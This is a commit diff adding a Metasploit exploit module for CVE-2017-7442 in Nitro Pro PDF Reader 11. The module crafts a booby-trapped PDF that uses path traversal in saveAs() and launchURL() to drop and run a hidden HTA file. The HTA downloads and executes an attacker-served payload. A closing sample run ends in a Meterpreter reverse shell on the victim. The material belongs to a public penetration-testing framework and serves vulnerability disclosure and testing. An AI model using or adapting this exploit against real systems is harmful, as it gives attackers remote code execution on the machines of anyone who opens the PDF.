Land rapid7#8761, Add CVE-2017-7442: Nitro Pro PDF Reader JS API Code X

wchen-r7 · wchen-r7 · commit c5021bf6652c · 2017-07-28T17:02:59.000-05:00
diff --git a/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb b/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
@@ -0,0 +1,219 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
+      'Description'    => %q{
+          This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
+          PDF Reader version 11. The saveAs() Javascript API function allows for writing
+          arbitrary files to the file system. Additionally, the launchURL() function allows
+          an attacker to execute local files on the file system and bypass the security dialog
+
+          Note: This is 100% reliable.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'mr_me <steven[at]srcincite.io>',         # vulnerability discovery and exploit
+        'Brendan Coles <bcoles [at] gmail.com>',  # hidden hta tricks!
+        'sinn3r'                                  # help with msf foo!
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-7442' ],
+          [ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ],           # public advisory #1
+          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ],    # public advisory #2 (verified and acquired by SSD)
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => false
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # truly universal
+          [ 'Automatic', { } ],
+        ],
+      'DisclosureDate' => 'Jul 24 2017',
+      'DefaultTarget'  => 0))
+
+      register_options([
+        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
+        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
+      ])
+      deregister_options('SSL', 'SSLVersion', 'SSLCert')
+  end
+
+  def build_vbs(url, stager_name)
+    name_xmlhttp  = rand_text_alpha(2)
+    name_adodb    = rand_text_alpha(2)
+    vbs           = %Q|<head><hta:application
+    applicationname="#{@payload_name}"
+    border="none"
+    borderstyle="normal"
+    caption="false"
+    contextmenu="false"
+    icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
+    maximizebutton="false"
+    minimizebutton="false"
+    navigable="false"
+    scroll="false"
+    selection="false"
+    showintaskbar="No"
+    sysmenu="false"
+    version="1.0"
+    windowstate="Minimize"></head>
+    <style>* { visibility: hidden; }</style>
+    <script language="VBScript">
+    window.resizeTo 1,1
+    window.moveTo -2000,-2000
+    </script>
+    <script type="text/javascript">setTimeout("window.close()", 5000);</script>
+    <script language="VBScript">
+    On Error Resume Next
+    Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
+    #{name_xmlhttp}.open "GET","http://#{url}",False
+    #{name_xmlhttp}.send
+    Set #{name_adodb} = CreateObject("ADODB.Stream")
+    #{name_adodb}.Open
+    #{name_adodb}.Type=1
+    #{name_adodb}.Write #{name_xmlhttp}.responseBody
+    #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
+    set shellobj = CreateObject("wscript.shell")
+    shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
+    </script>|
+    vbs.gsub!(/    /,'')
+    return vbs
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ /\.exe/
+      print_status("Sending second stage payload")
+      return if ((p=regenerate_payload(cli)) == nil)
+      data = generate_payload_exe( {:code=>p.encoded} )
+      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
+      return
+    end
+  end
+
+  def exploit
+    # In order to save binary data to the file system the payload is written to a .vbs
+    # file and execute it from there.
+    @payload_name = rand_text_alpha(4)
+    @temp_folder  = "/Windows/Temp"
+    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
+    if datastore['SRVHOST'] == '0.0.0.0'
+      lhost = Rex::Socket.source_address('50.50.50.50')
+    else
+      lhost = datastore['SRVHOST']
+    end
+    payload_src  = lhost
+    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
+    stager_name = rand_text_alpha(6) + ".vbs"
+    pdf = %Q|%PDF-1.7
+    4 0 obj
+    <<
+    /Length 0
+    >>
+    stream
+    |
+    pdf << build_vbs(payload_src, stager_name)
+    pdf << %Q|
+    endstream endobj
+    5 0 obj
+    <<
+    /Type /Page
+    /Parent 2 0 R
+    /Contents 4 0 R
+    >>
+    endobj
+    1 0 obj
+    <<
+    /Type /Catalog
+    /Pages 2 0 R
+    /OpenAction [ 5 0 R /Fit ]
+      /Names <<
+        /JavaScript <<
+          /Names [ (EmbeddedJS)
+            <<
+              /S /JavaScript
+              /JS (
+                    this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
+                    app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
+              )
+            >>
+          ]
+        >>
+      >>
+    >>
+    endobj
+    2 0 obj
+    <</Type/Pages/Count 1/Kids [ 5 0 R ]>>
+    endobj
+    3 0 obj
+    <<>>
+    endobj
+    xref
+    0 6
+    0000000000 65535 f
+    0000000166 00000 n
+    0000000244 00000 n
+    0000000305 00000 n
+    0000000009 00000 n
+    0000000058 00000 n
+    trailer <<
+    /Size 6
+    /Root 1 0 R
+    >>
+    startxref
+    327
+    %%EOF|
+    pdf.gsub!(/    /,'')
+    file_create(pdf)
+    super
+  end
+end
+
+=begin
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
+[*] Processing scripts/nitro.rc for ERB directives.
+resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
+resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (scripts/nitro.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/nitro.rc)> exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.175.1:4444 
+msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.100.4:8080/
+[*] Server started.
+[*] 192.168.100.4    nitro_reader_jsapi - Sending second stage payload
+[*] Sending stage (957487 bytes) to 172.16.175.232
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
+[+] Deleted C:/Windows/Temp/UOIr.hta
+
+msf exploit(nitro_reader_jsapi) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 2412 created.
+Channel 2 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\researcher\Desktop>
+=end
